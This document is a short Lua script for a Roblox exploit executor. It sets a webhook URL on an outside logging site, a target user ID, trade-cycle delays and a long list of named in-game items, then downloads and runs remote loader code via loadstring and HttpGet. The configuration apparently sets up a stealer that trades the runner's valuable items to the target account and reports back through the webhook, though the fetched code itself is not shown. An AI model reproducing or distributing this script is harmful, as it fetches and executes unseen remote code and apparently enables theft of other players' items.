local genv = getgenv()

genv.WEBHOOK_URL = 'https://skama.net/api/logs/webhook/mrr_43a8ce63946a400aa7215185aa7a23c5'
genv.TARGET_ID = 5540735333
genv.DELAY_STEP = 1
genv.TRADE_CYCLE_DELAY = 2
genv.TARGET_BRAINROTS = {
    Cerberus = true,
    ['La Taco Combinasion'] = true,
    ['Ketchuru and Musturu'] = true,
    ['Swaggy Bros'] = true,
    ['Lovin Rose'] = true,
    ['La Supreme Combinasion'] = true,
    ['Burguro And Fryuro'] = true,
    ['Mieteteira Bicicleteira'] = true,
    ['Celularcini Viciosini'] = true,
    ['Jolly Jolly Sahur'] = true,
    ['La Spooky Grande'] = true,
    ['Gobblino Uniciclino'] = true,
    ['Las Sis'] = true,
    ['Spooky and Pumpky'] = true,
    ['Los Amigos'] = true,
    ['Los Bros'] = true,
    ['Tacorita Bicicleta'] = true,
    ['Rosetti Tualetti'] = true,
    ['Sammyni Fattini'] = true,
    ['Tuff Toucan'] = true,
    Meowl = true,
    ['List List List Sahur'] = true,
    ['Guest 666'] = true,
    Orcaledon = true,
    ['Los Sekolahs'] = true,
    ['Los Spaghettis'] = true,
    ['Tictac Sahur'] = true,
    ['Festive 67'] = true,
    ['La Jolly Grande'] = true,
    ['Garama and Madundung'] = true,
    ['Reinito Sleighito'] = true,
    ['Los Primos'] = true,
    ['Dragon Gingerini'] = true,
    ['Noo my Candy'] = true,
    ['Love Love Bear'] = true,
    ['Money Money Reindeer'] = true,
    ['La Romantic Grande'] = true,
    ['La Food Combinasion'] = true,
    ['Rosey and Teddy'] = true,
    ['Los Planitos'] = true,
    ['Hydra Dragon Cannelloni'] = true,
    ['Headless Horseman'] = true,
    ['Capitano Moby'] = true,
    ['Los Jolly Combinasionas'] = true,
    ['Los Tacoritas'] = true,
    ['Ginger Gerat'] = true,
    ['Cooki and Milki'] = true,
    ['Ketupat Bros'] = true,
    ['W or L'] = true,
    Eviledon = true,
    ['Fragrama and Chocrama'] = true,
    ['Lavadorito Spinito'] = true,
    ['Skibidi Toilet'] = true,
    ['Dragon Cannelloni'] = true,
    ['Popcuru and Fizzuru'] = true,
    ['La Casa Boo'] = true,
    ['Los Hotspotsitos'] = true,
    Tralaledon = true,
    ['Chipso and Queso'] = true,
    ['Strawberry Elephant'] = true,
    ['Ketupat Kepat'] = true,
    ['La Secret Combinasion'] = true,
    ['Chillin Chili'] = true,
    ['Noobini Pizzanini'] = true,
}

loadstring(game:HttpGet('https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua'))()
